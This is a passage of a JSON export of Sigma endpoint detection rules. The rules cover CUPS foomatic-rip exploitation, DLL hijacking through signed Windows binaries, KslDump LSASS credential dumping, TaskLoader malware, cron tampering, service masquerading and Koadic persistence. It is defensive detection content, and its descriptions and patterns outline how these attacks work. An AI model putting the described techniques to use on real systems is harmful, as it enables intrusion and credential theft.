ProcessParentImage|endswith: '/foomatic-rip'\n sha256|contains: '?' # at least one character, some SHA256 are empty\n\n filter_image:\n ProcessImage:\n - '/usr/bin/foomatic-rip'\n - '/usr/lib/cups/filter/foomatic-rip'\n - '/usr/bin/cat'\n - '/usr/bin/gs'\n\n filter_gs:\n ProcessCommandLine|contains|all:\n - ' -c '\n - ' gs '\n - ' -dBATCH'\n - ' -dNOPAUSE'\n - ' -sDEVICE'\n\n exclusion_plg:\n ProcessCommandLine|contains|all:\n - '@PJL SET COPIES'\n - ' -dPARANOIDSAFER '\n - ' -sDEVICE='\n - ' -sOutputFile='\n\n exclusion_epson:\n ProcessParentCommandLine|contains|all:\n - 'Collate finishings='\n - 'number-up='\n - 'job-uuid='\n - 'job-originating-host-name='\n - 'time-at-creation='\n - 'time-at-processing='\n CommandLine|startswith: 'perl -p -e if (! $did) {'\n\n exclusion_printer_payloads:\n ProcessCommandLine|contains:\n # These payloads are from legitimate printer software/tools, primarily used during the pre-printing process.\n - '-c printf \"%%!PS-Adobe-3.0'\n - '/bin/sh -e -c foo2zjs-wrapper '\n - 'ipp://localhost/printers/'\n - '/pdffile (/tmp/foomatic-'\n - '/bin/sh -e -c pdftops '\n - '/var/spool/cups/tmp/foomatic-*'\n - '/bin/sh -e -c foo2xqx-wrapper '\n - '/bin/bash -e -c /bin/cat - | sicgsfilter '\n\n exclusion_cat:\n ProcessCommandLine:\n - '/bin/sh -e -c cat'\n - '/bin/bash -c cat'\n - '/bin/bash -e -c cat'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "2307c08f-aa49-4fa1-a3d5-d2a849e2bf17",
"rule_name": "CUPS CVE-2024-47177 Vulnerability Exploited",
"rule_description": "Detects the suspicious creation of child processes by the foomatic-rip process related to the exploitation of the CUPS (Common UNIX Printing System) vulnerability.\nThis detection rule is related to multiple vulnerabilities in the CUPS printing system, including CVE-2024-47176, CVE-2024-47076, CVE-2024-47175, and CVE-2024-47177.\nThese flaws allow for remote unauthenticated attackers to manipulate IPP URLs or inject malicious data through crafted UDP packets or network spoofing.\nThis can result in arbitrary command execution when a print job is initiated.\nIt is recommended to investigate the command-line performing this action to determine its legitimacy.\n",
"rule_creation_date": "2024-10-02",
"rule_modified_date": "2025-12-17",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution"
],
"rule_technique_tags": [
"attack.t1203"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "2312ad6d-35cc-45d7-83a7-08f4131d32b0",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.600939Z",
"creation_date": "2026-03-23T11:45:34.600943Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.600951Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_winlogon.yml",
"content": "title: DLL Hijacking via winlogon.exe\nid: 2312ad6d-35cc-45d7-83a7-08f4131d32b0\ndescription: |\n Detects potential Windows DLL Hijacking via winlogon.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'winlogon.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\UXINIT.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "2312ad6d-35cc-45d7-83a7-08f4131d32b0",
"rule_name": "DLL Hijacking via winlogon.exe",
"rule_description": "Detects potential Windows DLL Hijacking via winlogon.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "2319811a-6bed-4f5b-988c-74630cf93daf",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T16:07:52.726835Z",
"creation_date": "2026-03-23T11:45:34.623641Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.623645Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/andreisss/KslDump",
"https://attack.mitre.org/techniques/T1003/001/"
],
"name": "t1003_001_ksldump.yml",
"content": "title: KslDump Technique Detected\nid: 2319811a-6bed-4f5b-988c-74630cf93daf\ndescription: |\n Detects the KslDump technique by monitoring suspicious modifications to the Ksl service's registry key.\n KslDump steals LSASS credentials from a PPL protected system using only Microsoft signed components.\n The attack simply redirects the Windows Defender service to an older, vulnerable copy of KslD.sys (drivers\\KslD.sys) that Microsoft left on disk.\n KslD.sys gives usermode code a direct path to MmCopyMemory() which allows attackers to bypass PPL and allows an arbitrary process to dump LSASS.\n The only gate to the device handle is a process name string stored in a registry key (AllowedProcessName).\n It is recommended to check the process that modified the registry value and the details for suspicious activities.\nreferences:\n - https://github.com/andreisss/KslDump\n - https://attack.mitre.org/techniques/T1003/001/\ndate: 2026/03/18\nmodified: 2026/03/23\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1003.001\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.CredentialAccess\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: SetValue\n TargetObject: 'HKLM\\SYSTEM\\CurrentControlSet\\Services\\KslD\\AllowedProcessName'\n\n filter_legit_defender:\n Details:\n - '\\Device\\HarddiskVolume*\\ProgramData\\Microsoft\\Windows Defender\\Platform\\\\*\\MsMpEng.exe'\n - '\\Device\\HarddiskVolume*\\Program Files\\Windows Defender\\MsMpEng.exe'\n\n condition: selection and not 1 of filter_*\nlevel: critical\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "2319811a-6bed-4f5b-988c-74630cf93daf",
"rule_name": "KslDump Technique Detected",
"rule_description": "Detects the KslDump technique by monitoring suspicious modifications to the Ksl service's registry key.\nKslDump steals LSASS credentials from a PPL protected system using only Microsoft signed components.\nThe attack simply redirects the Windows Defender service to an older, vulnerable copy of KslD.sys (drivers\\KslD.sys) that Microsoft left on disk.\nKslD.sys gives usermode code a direct path to MmCopyMemory() which allows attackers to bypass PPL and allows an arbitrary process to dump LSASS.\nThe only gate to the device handle is a process name string stored in a registry key (AllowedProcessName).\nIt is recommended to check the process that modified the registry value and the details for suspicious activities.\n",
"rule_creation_date": "2026-03-18",
"rule_modified_date": "2026-03-23",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access"
],
"rule_technique_tags": [
"attack.t1003.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "233bd602-6fe8-4484-991f-3b45ef546127",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.604263Z",
"creation_date": "2026-03-23T11:45:34.604266Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.604274Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.file.net/process/sitool.exe.html",
"https://attack.mitre.org/techniques/T1071/001/"
],
"name": "t1071_001_sitool_malware.yml",
"content": "title: TaskLoader Malware Execution\nid: 233bd602-6fe8-4484-991f-3b45ef546127\ndescription: |\n Detects the execution of the TaskLoader malware.\n TaskLoader is malware that usually spreads through cracked software and contacts its C2 server for remote command execution.\n It is named TaskLoader as it utilizes scheduled tasks for persistence.\n The Sitool binary has also been associated with other malware families such as njRAT or Sabsik.\n It is recommended to examine this file further and look for persistence traces - especially scheduled tasks - on the infected computers.\nreferences:\n - https://www.file.net/process/sitool.exe.html\n - https://attack.mitre.org/techniques/T1071/001/\ndate: 2023/06/16\nmodified: 2025/03/07\nauthor: HarfangLab\ntags:\n - attack.command_and_control\n - attack.t1071.001\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Malware.TaskLoader\n - classification.Windows.Behavior.CommandAndControl\nlogsource:\n product: windows\n category: process_creation\ndetection:\n selection:\n OriginalFileName: 'sihost.exe'\n Image|endswith: '\\sitool.exe'\n\n condition: selection\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "233bd602-6fe8-4484-991f-3b45ef546127",
"rule_name": "TaskLoader Malware Execution",
"rule_description": "Detects the execution of the TaskLoader malware.\nTaskLoader is malware that usually spreads through cracked software and contacts its C2 server for remote command execution.\nIt is named TaskLoader as it utilizes scheduled tasks for persistence.\nThe Sitool binary has also been associated with other malware families such as njRAT or Sabsik.\nIt is recommended to examine this file further and look for persistence traces - especially scheduled tasks - on the infected computers.\n",
"rule_creation_date": "2023-06-16",
"rule_modified_date": "2025-03-07",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.command_and_control"
],
"rule_technique_tags": [
"attack.t1071.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "23401fcc-11a5-4f33-b901-caca2fc67071",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.617355Z",
"creation_date": "2026-03-23T11:45:34.617357Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.617361Z",
"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.003/T1053.003.md",
"https://attack.mitre.org/techniques/T1053/003/"
],
"name": "t1053_003_cron_file_macos.yml",
"content": "title: Crontab-Related Files Read (macOS)\nid: 23401fcc-11a5-4f33-b901-caca2fc67071\ndescription: |\n Detects the access to a cron job files without the use of crontab.\n An attacker could add a malicious cron job for persistence.\n It is recommended to check the content of the file in command-line for any unwanted lines.\nreferences:\n - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.003/T1053.003.md\n - https://attack.mitre.org/techniques/T1053/003/\ndate: 2022/11/14\nmodified: 2025/01/30\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1053.003\n - classification.macOS.Source.ProcessCreation\n - classification.macOS.Behavior.Persistence\nlogsource:\n category: process_creation\n product: macos\ndetection:\n selection:\n Image:\n - '/bin/sh'\n - '/bin/bash'\n - '/bin/csh'\n - '/bin/dash'\n - '/bin/ksh'\n - '/bin/tcsh'\n - '/bin/zsh'\n - '/bin/cat'\n - '/bin/echo'\n - '/bin/mv'\n - '/bin/cp'\n - '/usr/bin/less'\n - '/usr/bin/more'\n - '/usr/bin/vi'\n - '/usr/bin/vim'\n\n CommandLine|contains:\n # Match /etc/crontab and /etc/cron.daily and so on\n - '/etc/cron'\n # Alternative way to execute cron jobs via periodic\n - '/etc/periodic'\n - '/private/var/at'\n # symlink to /private/var/at\n - '/usr/lib/cron'\n\n exclusion_crontab_parent:\n ParentImage: '/usr/bin/crontab'\n\n # /bin/sh /etc/periodic/daily/199.clean-fax\n # /bin/sh - /etc/periodic/weekly/999.local\n # sh -c /etc/periodic/daily/999.local\n exclusion_periodic_exec:\n CommandLine|startswith:\n - '/bin/sh /etc/periodic'\n - '/bin/sh - /etc/periodic'\n - 'sh -c /etc/periodic'\n condition: selection and not 1 of exclusion_*\nlevel: medium\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "23401fcc-11a5-4f33-b901-caca2fc67071",
"rule_name": "Crontab-Related Files Read (macOS)",
"rule_description": "Detects access to cron job files without the use of crontab.\nAn attacker could add a malicious cron job for persistence.\nIt is recommended to check the content of the file in command-line for any unwanted lines.\n",
"rule_creation_date": "2022-11-14",
"rule_modified_date": "2025-01-30",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1053.003"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "23739d71-74b5-47ee-81b8-7aa4d21af3bc",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:35.294721Z",
"creation_date": "2026-03-23T11:45:35.294724Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:35.294729Z",
"rule_level": "medium",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1036/004/",
"https://attack.mitre.org/techniques/T1036/005/",
"https://attack.mitre.org/techniques/T1569/"
],
"name": "t1036_004_systemd_service_manually_started.yml",
"content": "title: System Service Manually Started\nid: 23739d71-74b5-47ee-81b8-7aa4d21af3bc\ndescription: |\n Detects a potential attempt to manually start a system service, instead of relying on the system standard service utilities.\n This might be an attempt to masquerade a custom binary as a system service or maliciously interfere with the way services are naturally handled.\n It is recommended to check if the binary is expected to be executed that way.\nreferences:\n - https://attack.mitre.org/techniques/T1036/004/\n - https://attack.mitre.org/techniques/T1036/005/\n - https://attack.mitre.org/techniques/T1569/\ndate: 2023/12/15\nmodified: 2026/02/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1036.004\n - attack.t1036.005\n - attack.execution\n - attack.t1569\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.Behavior.DefenseEvasion\n - classification.Linux.Behavior.Masquerading\nlogsource:\n category: process_creation\n product: linux\ndetection:\n selection:\n Image|endswith:\n - '/sshd'\n - '/cron'\n - '/crond'\n - '/cupsd'\n ParentImage|contains: '?'\n\n filter_forks:\n ParentImage|endswith:\n - '/sshd'\n - '/cron'\n - '/crond'\n - '/cupsd'\n\n filter_systemd:\n - ParentImage:\n - '/lib/systemd/systemd'\n - '/usr/lib/systemd/systemd'\n - '/nix/store/*-systemd-*/lib/systemd/systemd'\n - GrandparentImage:\n - '/lib/systemd/systemd'\n - '/usr/lib/systemd/systemd'\n - '/nix/store/*-systemd-*/lib/systemd/systemd'\n\n exclusion_ossec:\n ParentImage: '/var/ossec/bin/wazuh-modulesd'\n\n exclusion_insights_client:\n CommandLine: '/usr/sbin/sshd -T'\n GrandparentCommandLine|startswith:\n - '/usr/bin/python /usr/lib/python*/site-packages/insights_client/run.py '\n - '/usr/libexec/platform-python /usr/lib/python*/site-packages/insights_client/run.py '\n\n exclusion_sshd_basic_args_1:\n Image|endswith: '/sshd'\n CommandLine|contains:\n - ' -t '\n - ' -h '\n - ' -v '\n\n exclusion_sshd_basic_args_2:\n Image|endswith: 
'/sshd'\n CommandLine|endswith:\n - ' -t'\n - ' -h'\n - ' -v'\n - ' -?'\n\n exclusion_puppet:\n - ParentImage: '/opt/puppetlabs/puppet/bin/ruby'\n - GrandparentImage: '/opt/puppetlabs/puppet/bin/ruby'\n\n exclusion_s6_supervise:\n ProcessParentImage|endswith:\n - '/s6-supervise'\n - '/s6-svscan '\n\n exclusion_qualys:\n ProcessAncestors|contains:\n - '/usr/local/qualys/cloud-agent/bin/qualys-scan-util'\n - '/usr/local/qualys/cloud-agent/bin/qualys-cloud-agent'\n\n exclusion_supervisord:\n ProcessParentCommandLine|contains: '/usr/bin/supervisord'\n\n exclusion_init:\n - ProcessParentCommandLine|contains: '/etc/init.d/'\n - ProcessGrandparentCommandLine|contains: '/sbin/init splash'\n - ProcessParentImage: '/sbin/init'\n - ProcessGrandparentImage: '/sbin/init'\n - ProcessParentCommandLine: '/sbin/init'\n - ProcessGrandparentCommandLine: '/sbin/init'\n\n exclusion_containerd:\n - ProcessAncestors|contains: '/containerd-shim-runc-v2'\n - ProcessGrandparentImage: '/sbin/docker-init'\n\n exclusion_runsvdir:\n - ProcessParentCommandLine|contains: 'runsvdir'\n - ProcessParentCommandLine|contains: 'runsvdir'\n\n exclusion_cups_snap:\n ProcessParentCommandLine: '/bin/sh /snap/cups/*/scripts/run-cupsd'\n\n exclusion_busybox:\n ProcessParentImage: '/bin/busybox'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: medium\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "23739d71-74b5-47ee-81b8-7aa4d21af3bc",
"rule_name": "System Service Manually Started",
"rule_description": "Detects a potential attempt to manually start a system service, instead of relying on the system standard service utilities.\nThis might be an attempt to masquerade a custom binary as a system service or maliciously interfere with the way services are naturally handled.\nIt is recommended to check if the binary is expected to be executed that way.\n",
"rule_creation_date": "2023-12-15",
"rule_modified_date": "2026-02-11",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.execution"
],
"rule_technique_tags": [
"attack.t1036.004",
"attack.t1036.005",
"attack.t1569"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "23ae76e3-7f36-4f3d-986c-cd449deeb266",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.091265Z",
"creation_date": "2026-03-23T11:45:34.091267Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.091271Z",
"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/offsecginger/koadic",
"https://attack.mitre.org/software/S0250/",
"https://attack.mitre.org/techniques/T1547/"
],
"name": "t1547_koadic_script_auto_run.yml",
"content": "title: Koadic Auto Run Script Created\nid: 23ae76e3-7f36-4f3d-986c-cd449deeb266\ndescription: |\n Detects the creation of a .HTA file used to reconnect a system infected by Koadic back to its C2 server.\n Koadic is a Windows post-exploitation framework and penetration testing tool that is publicly available on GitHub.\n It is recommended to analyze the process responsible for creation of this file to look for other malicious actions, as well as to investigate suspicious network activity from a potential Koadic beacon.\nreferences:\n - https://github.com/offsecginger/koadic\n - https://attack.mitre.org/software/S0250/\n - https://attack.mitre.org/techniques/T1547/\ndate: 2021/02/11\nmodified: 2025/01/30\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1547\n - attack.s0250\n - classification.Windows.Source.Filesystem\n - classification.Windows.Framework.Koadic\n - classification.Windows.Behavior.CommandAndControl\n - classification.Windows.Behavior.Persistence\nlogsource:\n product: windows\n category: filesystem_create\ndetection:\n selection:\n Path|endswith:\n - '\\AppData\\Roaming\\\\??????????.hta'\n - '\\ProgramData\\\\??????????.hta'\n\n condition: selection\nlevel: medium\n# level: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "23ae76e3-7f36-4f3d-986c-cd449deeb266",
"rule_name": "Koadic Auto Run Script Created",
"rule_description": "Detects the creation of a .HTA file used to reconnect a system infected by Koadic back to its C2 server.\nKoadic is a Windows post-exploitation framework and penetration testing tool that is publicly available on GitHub.\nIt is recommended to analyze the process responsible for creation of this file to look for other malicious actions, as well as to investigate suspicious network activity from a potential Koadic beacon.\n",
"rule_creation_date": "2021-02-11",
"rule_modified_date": "2025-01-30",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1547"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "23c070c2-f80e-42b8-a453-5cda9de44edb",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.098949Z",
"creation_date": "2026-03-23T11:45:34.098951Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.098961Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://github.com/xforcered/WFH",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_lockscreencontentserver.yml",
"content": "title: DLL Hijacking via lockscreencontentserver.exe\nid: 23c070c2-f80e-42b8-a453-5cda9de44edb\ndescription: |\n Detects potential Windows DLL Hijacking via lockscreencontentserver.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers use this technique by copying a legitimate Windows-signed executable from System32 or SysWow64 to a non-standard directory and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'lockscreencontentserver.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\duser.dll'\n - '\\dwmapi.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "23c070c2-f80e-42b8-a453-5cda9de44edb",
"rule_name": "DLL Hijacking via lockscreencontentserver.exe",
"rule_description": "Detects potential Windows DLL Hijacking via lockscreencontentserver.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers use this technique by copying a legitimate Windows-signed executable from System32 or SysWow64 to a non-standard directory and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "23c4819b-cfa3-4862-a35c-8735c0ec96a4",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
